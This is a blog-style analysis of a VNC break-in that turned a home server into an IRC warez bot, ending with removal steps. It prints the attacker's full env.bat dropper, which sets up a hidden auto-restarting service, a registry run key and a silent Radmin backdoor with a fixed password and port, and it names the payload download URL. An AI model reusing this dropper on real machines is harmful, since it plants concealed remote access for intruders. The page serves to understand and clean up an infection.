* endellion.me.uk

 

kj.exe turning into Ms-java.exe, userlist.exe, and mssvc.exe

An AOL customer found my Server with VNC and broke in. This was not a script, I don't think. When a script knocks on the VNC door, the packet captures show a lot of "key event" entries, but this was a lot of "pointer events" and framebuffer updates. I think that this guy must actually be sat behind his computer doing this to vulnerable computers he has been scanning automatically.
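As an added illustration (not from the original write-up), the key-event versus pointer-event distinction seen in those packet captures can be turned into a check: the parser walks the client-to-server messages of the RFB protocol that VNC speaks (after the handshake) and tallies them by type. The two byte streams are constructed samples built by the encoders in the block, not captures from this incident.

```python
import struct
from collections import Counter

# RFB (VNC) client-to-server message types, RFC 6143 section 7.5
MSG_NAMES = {0: "SetPixelFormat", 2: "SetEncodings", 3: "FramebufferUpdateRequest",
             4: "KeyEvent", 5: "PointerEvent", 6: "ClientCutText"}

def parse_client_messages(payload):
    """Split a post-handshake client-to-server RFB stream into (name, size) tuples."""
    msgs, i = [], 0
    while i < len(payload):
        t = payload[i]
        if t == 0:                                    # 3 pad bytes + 16-byte PIXEL_FORMAT
            size = 20
        elif t == 2:                                  # 1 pad + u16 count + 4 bytes per encoding
            size = 4 + 4 * struct.unpack_from(">H", payload, i + 2)[0]
        elif t == 3:                                  # incremental flag + x, y, w, h
            size = 10
        elif t == 4:                                  # down flag + 2 pad + u32 keysym
            size = 8
        elif t == 5:                                  # button mask + u16 x + u16 y
            size = 6
        elif t == 6:                                  # 3 pad + u32 length + text
            size = 8 + struct.unpack_from(">I", payload, i + 4)[0]
        else:
            raise ValueError(f"unknown client message type {t} at offset {i}")
        msgs.append((MSG_NAMES[t], size))
        i += size
    return msgs

def classify_session(payload):
    """Write-up's heuristic: scripts send mostly KeyEvents, humans PointerEvents and update requests."""
    counts = Counter(name for name, _ in parse_client_messages(payload))
    verdict = "scripted" if counts["KeyEvent"] > counts["PointerEvent"] else "interactive"
    return verdict, dict(counts)

# Encoders used only to build the constructed samples below (not real captures)
def key_event(keysym, down=True):
    return struct.pack(">BBxxI", 4, int(down), keysym)
def pointer_event(x, y, mask=0):
    return struct.pack(">BBHH", 5, mask, x, y)
def fb_update_request(x, y, w, h, incremental=True):
    return struct.pack(">BBHHHH", 3, int(incremental), x, y, w, h)

# A script typing "admin" and Enter: press/release pairs, never touching the pointer
SCRIPTED = b"".join(key_event(ord(c)) + key_event(ord(c), False) for c in "admin") \
           + key_event(0xFF0D) + key_event(0xFF0D, False)
# A person dragging the pointer across the desktop, refreshing the screen, then clicking
HUMAN = b"".join(pointer_event(100 + 8 * i, 240) + fb_update_request(0, 0, 1024, 768)
                 for i in range(6)) + pointer_event(148, 240, mask=1)
```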

AOL man has Server download kj.exe from http://freewebtowns.com/scooby68/kj.exe. This is a self-extracting archive containing lots of little (and not so little) proggies, all to be hidden in the Windows\Driver Cache\i386 directory. The default Windows installation cannot even look into this directory as it is hidden.

kj

The noticeable files here are cygwin, a sort of Linux emulator for Windows, and ServU, an FTP server. Good start. Now for the less obvious files.

Since the setup is going to invoke env.bat first, I will look at that first too, so as to get an idea of what is going to happen.

env.bat
rem @echo off
echo Setting Environment Variable for Rootkit's Root Folder
cd %windir%\Driver~1\i386
echo user_nick [rmb]-music-%RANDOM% >> xdcc.config

echo [settings] > ms-java.ini
echo ServiceName = Ms-java >> ms-java.ini
echo ProcCount = 2 >> ms-java.ini
echo CheckProcess = 1 >> ms-java.ini

echo [Process0] >> ms-java.ini
echo CommandLine = %windir%\Driver~1\i386\userlist.exe xdcc.config >> ms-java.ini
echo WorkingDir =  %windir%\Driver~1\i386\ >> ms-java.ini
echo PauseStart = 1000 >> ms-java.ini
echo PauseEnd = 1000 >> ms-java.ini
echo UserInterface = no >> ms-java.ini
echo Restart = Yes >> ms-java.ini

echo [Process1] >> ms-java.ini
echo CommandLine = %windir%\Driver~1\i386\mssvc.exe >> ms-java.ini
echo WorkingDir =  %windir%\Driver~1\i386\ >> ms-java.ini
echo PauseStart = 1000 >> ms-java.ini
echo PauseEnd = 1000 >> ms-java.ini
echo UserInterface = no >> ms-java.ini
echo Restart = Yes >> ms-java.ini
mkdir security
attrib +sh security
ms-java -i
net start ms-java
if exist c:\windows\command.com goto WIN98
goto END

:WIN98
echo REGEDIT4 > xdcc.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] >> xdcc.reg
echo "LoadPowerProfiles"="driver~1\\i386\\run.bat" >> xdcc.reg
attrib +h ..\..\driver~1
regedit /s xdcc.reg
start /m run.bat
goto END

:END
c:\winnt\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
c:\windows\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
c:\progra~1\radmin\r_server.exe /pass:datasafe /port:4899 /silence /save
%windir%\system32\r_server.exe /pass:datasafe /port:4899 /silence /save
ms-java -i
net start ms-java
:ERASING
k setup
k micha
del c:\rars.exe
del c:\micha.exe
del c:\root.exe
del \kj.exe
del \micha.exe
del \setup.exe
del \update.exe
if EXIST \kj.exe goto ERASING
if EXIST \root.exe goto ERASING
if EXIST \micha.exe goto ERASING
if EXIST \update.exe goto ERASING
del xdcc.reg
del env.bat

Surely this blighter is not a rootkit? I think these virus people might be taking themselves a little too seriously...

Well, what is this thing doing, then? It writes lines to a couple of config files: first a random user name appended to xdcc.config, then the ms-java.ini that creates the ms-java service, and it ends with attempts to erase files that weren't even included in this distribution.

Here is the ms-java.ini that has been created:

ms-java.ini
[settings]
ServiceName = Ms-java
ProcCount = 2
CheckProcess = 1
[Process0]
CommandLine = F:\WINDOWS\Driver~1\i386\userlist.exe xdcc.config
WorkingDir =  F:\WINDOWS\Driver~1\i386\
PauseStart = 1000
PauseEnd = 1000
UserInterface = no
Restart = Yes
[Process1]
CommandLine = F:\WINDOWS\Driver~1\i386\mssvc.exe
WorkingDir =  F:\WINDOWS\Driver~1\i386\
PauseStart = 1000
PauseEnd = 1000
UserInterface = no
Restart = Yes

Ms-java is registered as a service. This is the program that is going to make sure that both userlist.exe and mssvc.exe are restarted if someone had the gall to stop them. So, what is userlist.exe? It takes xdcc.config as its parameter, so we shall look at it now.

xdcc.config

## edit only these 3 commands ##
user_realname Peace
loginname ME
## love me  ##

pidfile spoolvc.dll
logfile svchost.dll
logstats no
logrotate monthly
connectionmethod direct
statefile mybot.state

###                         - server information -                         ###
server irc.1andallIRC.net 6667
#-chans---------------------------|
channel #xboxland-mp3 -plist 40
user_modes +i

tcprangestart 1024
slotsmax 1
queuesize 50
maxtransfersperperson 1
maxqueueditemsperperson 1
filedir security/
restrictlist
restrictprivlist
restrictprivlistmsg Wait for public list in the channel.
restrictsend
respondtochannelxdcc
respondtochannellist
downloadhost *!*@*
lowbdwth 1
transfermaxspeed 2000
overallmaxspeed 6000

overallmaxspeeddayspeed 6000

adminpass U1BJUklU
adminhost *!*@*busy.as.a.bea
adminhost *!*@*i.am.not.amused
adminhost *!*@*bark@the.moon

uploadhost *!*@*
uploaddir security
hideos
notifytime 25
headline    4Only 6the 8best 9from 12#xboxland-mp3

creditline  4Only 6the 8best 9from 12#xboxland-mp3

#############################
###                        ##
### DO NOT EDIT THIS PART  ##
###                        ##
#############################

user_nick [rmb]-music-7245

This is going to want to log into an IRC server. This is also where the problems begin.

After I install this virus, it gives a load of error messages, including something that flashes by quickly about 16-bit incompatibility. And then it would not connect to this IRC server for love nor money. The very good thing is that troubleshooting tools are included in this package of malware: the virus does logging. And this is what the log has to say:

EROOR: adminpass is not encrypted!

iroffer exited (Error)

Great work. To me, U1BJUklU looked fairly encrypted, but it's no good. I google this bunch of letters and find that a faulty SQL server somewhere has mangled a username "SPIRIT" into this exact combination. This is UTF-8 or something, not what iroffer wants. I take the password protection off, and this time it runs. I try to find out how to re-encode the password. It seems that iroffer has a -c parameter that will prepare the right phrase. As I am doing this, AOL man actually comes along and tries to log into his IRC bot. He uses the password SPIRIT. Wow. But he is rejected. Rather than allowing all when there is no set password, it appears iroffer allows none. Before I'm done, AOL Man and his Mate from BT have both tried to log in on numerous occasions, trying nine different passwords twelve times. This must mean that they a) don't always use the same password, and b) don't always remember which bot gets sent where.
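As an added example (not code from the original write-up), here is a small triage script for an iroffer config like the xdcc.config above: it parses the line-oriented key-value format, pulls out the IRC rendezvous point, the bot nick and the admin hosts, and checks whether adminpass is merely base64 of a plaintext credential, which is exactly what U1BJUklU is (it decodes to SPIRIT, the password AOL Man later typed). It says nothing about iroffer's own encrypted format, which this page does not show; the sample text is an excerpt of the page's xdcc.config.

```python
import base64
import binascii

def parse_iroffer_config(text):
    """iroffer config: '#' comments, one 'key value' per line, some keys repeatable."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            cfg.setdefault(key, []).append(value.strip())
    return cfg

def recover_plaintext(adminpass):
    """Plaintext if adminpass is just base64 of printable ASCII, else None.
    A reversible encoding is not protection: anyone holding the config can undo it."""
    try:
        text = base64.b64decode(adminpass, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None

def triage(text):
    """What a responder wants from an XDCC bot config: rendezvous point, who may
    administer it, and whether the admin credential is exposed."""
    cfg = parse_iroffer_config(text)
    server = cfg.get("server", [""])[0].split()
    return {
        "irc_server": server[0] if server else None,
        "irc_port": int(server[1]) if len(server) > 1 else 6667,   # IRC default
        "channels": [c.split()[0] for c in cfg.get("channel", [])],
        "nick": cfg.get("user_nick", [None])[-1],         # env.bat appends this last
        "admin_hosts": cfg.get("adminhost", []),
        "adminpass_plaintext": recover_plaintext(cfg.get("adminpass", [""])[0]),
        "share_dir": cfg.get("filedir", [None])[0],
    }

# Excerpt of the page's xdcc.config, trimmed to the lines the triage reads
SAMPLE = """\
## edit only these 3 commands ##
user_realname Peace
server irc.1andallIRC.net 6667
channel #xboxland-mp3 -plist 40
filedir security/
adminpass U1BJUklU
adminhost *!*@*busy.as.a.bea
adminhost *!*@*i.am.not.amused
user_nick [rmb]-music-7245
"""
```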

Back online with a newly encrypted password, but AOL Man presumably only does this when he comes home from school, college or god forbid the office. Around ten past five in the afternoon seems to be his favourite time... Plenty of time to find out about the ServU.

Apparently the reason hackercrackers use the ServU is that it is so darned easy to use. Install and away you go, with a lovely GUI and whatnot. I download a trial version of the ServU. I install the client ("ServU Administrator") on Server, where it finds its server companion right away despite it being run on a different port, and with a different name. Keep up the good work. I create an administrator user, then log on from my machine.

servu

There are two users pre-created on this server, bread and sparky. They don't have administrative privileges. I google around to find that this is common sense for these hackertypes, since it's not altogether that hard to break into one of these things, and your rival could lock you out with great ease.

I wait for files to be uploaded, but nothing happens in this respect -- four days on, still no joy. (Having said that, my big machine with the VMware was offline with poorly processors yesterday.)

There is action on the IRC front before long though: someone comes round to upload "Seventies Heart Throbs". I ask you. Of all the MP3s they could have given me here, what the hell was that for?

I used mIRC to hang around in the channel I was directed to (#XBOXLAND-MP3) and found that /list worked. There were quite a few channels, with warez and music and gamez and appz and whatever else. Of all the channels they could have assigned me to, why did I have to get this one? Also these channels were very busy indeed, a lot more "customers" than bots. Googling around found that there are even websites which index the bots in these channels. Amazing what you can find on the web. http://ircdig.com/ for instance. Here's a snippet of that, having searched for the room which Server is hanging out in:

ircdig

There are lots of them, and it is amazing to think that more or less all (presumably) these "servers" or "bots" are computers belonging to people who have no idea that they are partaking in this. "The internet is slow" or "I have a weird process running" is as good as it gets.

Anyways, Beauty!offer2@1andallIRC-E1F40AAE.static.reverse.layeredtech.com (72.36.197.250) uploads these heart throbs. The best thing about running these virus programs is that if you do it yourself you can run them in a command window that doesn't close right away, unlike the hapless infectee. This means you get all the output. Beauty was able to offload 70 MB of heart throb music at 275 KB/s apparently. I never knew I had upload speeds like that, it's over 2 meg! Have Be put me on the enhanced pack without telling me?

Next day at ten past five, in comes AOL Man. He checks his messages. There is one: some spam came in the night. He deletes it. Then he checks to see what files if any have been uploaded, and leaves. Well actually he doesn't leave, since the connection stays active, and therefore noticeable, but from the IRC channel I see he has a ping timeout. His client end to iroffer should be slightly less careless. This is a dead giveaway, surely.

The day after that, which was yesterday, we were offline what with the processor trouble. Since it has been back up, there's been much dawdling on the mp3 channel, but no activity. It is 10 past 5 now...

Perhaps our AOL Man has grown suspicious? I hope not. The fact that the webserver runs from the same IP doesn't normally seem to deter them one bit.

Removal

First, unplug your network cable or modem. Browse to your Windows\Driver Cache\i386 directory. Here are the nasties. Right click on My Computer, then "Manage." Go to Services. Here you will find the Ms-java service. Stop the service, and set it not to start up. Now bring up the task manager, and kill Ms-java, Mssvc.exe and userlist.exe. Make sure they don't come back. If need be, restart the computer (in safe mode even). If you have set the Ms-java service to disabled, the virus won't run. Now delete the whole contents of the i386 directory, apart from the driver.cab, which is legit and needed. Now run regedit, navigate to HKLM\SYSTEM\CurrentControlSet\Services, and find ms-java. Right click on it in the left hand column and delete the whole thing.

reg